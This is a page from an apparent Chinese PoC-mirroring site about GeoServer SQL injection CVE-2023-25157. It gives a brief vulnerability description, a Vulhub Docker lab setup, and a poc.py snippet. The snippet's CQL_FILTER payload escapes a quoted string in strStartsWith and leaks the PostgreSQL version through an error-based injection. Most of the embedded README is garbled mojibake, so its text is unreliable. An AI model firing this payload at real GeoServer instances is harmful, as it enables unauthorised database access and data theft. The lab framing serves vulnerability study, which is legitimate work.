POC详情: c98ecc87f2a64a9f3027627854a9e4ea67addbd1

来源
关联漏洞
标题: GeoServer SQL注入漏洞 (CVE-2023-25157)
描述:GeoServer是一个用 Java 编写的开源软件服务器。允许用户共享和编辑地理空间数据。 GeoServer 2.21.4之前、2.22.2之前版本存在安全漏洞,该漏洞源于 ``strEndsWith``、``strStartsWith`` 和 ``PropertyIsLike `` 存在滥用 问题。
介绍
��# geoserver CVE-2023-25157

> T�tǸ҇� 30� [30�] @�Ȱ�

---

github ��l� - https://github.com/custiya/geoserver-CVE-2023-25157



### ��}�� ��}�

* CVE-2023-25157�� GeoServer|��� $�Ռ��� ��ij p�t�0� �D��� �� `�լ��t�X��� �t� ���\� SQLi ��}��

* GeoServer 2.22.0 t�X�X� |ǀ� ������ ���

* WFS(Web Feature Service) �ƭ�X� CQL_FILTER|��� �|���0�� ��}�h�

* xǝ���t� t��� API�� ��� ���X��t� �l�� tǩ� ���



### Xֽ� l�1�

* docker compose up -d ���ܴ\� LѤ¸� Xֽ� �‰�

* http://your-ip:8080/geoserver \� ��t����� ȍ� ���

* <�� PostGIS p�t�0� ȥnj�� ��h�� 0�t� ���� ������t�|� h�

* VulhubX� GeoServer xǤ�4Ѥ��Ŕ� t��� PostGIS p�t�0� ȥnj�� tȬ�

    * ���� ��� tD� : vulhub

    * p�t�0� ȥnj� tDŽ� : pg

    * L�t�� tD� : example

    * ����\� ��1� : name



### poc.py

* ���� � ˆ�X� ����D� 0��<�\� sqli l�8�D� ̹� ���

* t��� l�8�D� request��ȴD� ����X��� ����� ��

* strStartsWith(name,'x'') = true

    * x ��X� '|� X՘� T� ���X�p� sql 8��� �4�

* and 1=(SELECT CAST ((SELECT version()) AS integer))

    * version() h�”� PostgreSQLX� ֬� ���D� �X�XՔ� h��t�p�, 8�����

    * CAST(... AS integer)�� ��\� ��\� ��X�X���\� $�X�� ���

    * ����� ��� T�����|� �X�XՌ� ���, Blind SQL Injection LѤ¸�� ���

```

# ��� URL

url = "http://localhost:8080/geoserver/ows"



# CQL_FILTER�� 䴴�� ���� x��X� 8����� (URL �T�)�� ����)

cql_filter = "strStartsWith(name,'x'') = true and 1=(SELECT CAST ((SELECT version()) AS integer)) -- ') = true"



# �|���0� $��

params = {

    "service": "wfs",

    "version": "1.0.0",

    "request": "GetFeature",

    "typeName": "vulhub:example",

    "CQL_FILTER": cql_filter

}

```

### ����

![Alt text](result.png)



### Ȭ�

* t��� poc|� ��t� SQLiX� ��� �ŀ�|� L�D� �� � �����. �����ǔ� SQL �Ϭ�|� ��X��� �¤�\� ����D� ���`� � ��D� �� ��.

* t��� ����D� ɹ0� �X���, ���Ɛ� ��%�� ����t� DՔ�t� ������|� \��. �\� ��%� �@� SQL l�8�D� �\� ����t�� ����XՔ� ��t� D�Ȳ|� ļij\� ȥ�X��� ����X���|� \��.
文件快照

[4.0K] /data/pocs/c98ecc87f2a64a9f3027627854a9e4ea67addbd1 ├── [ 321] docker-compose.yml ├── [ 744] poc.py ├── [3.1K] README.md ├── [ 85K] result.png └── [1.6K] startup.sh 0 directories, 5 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。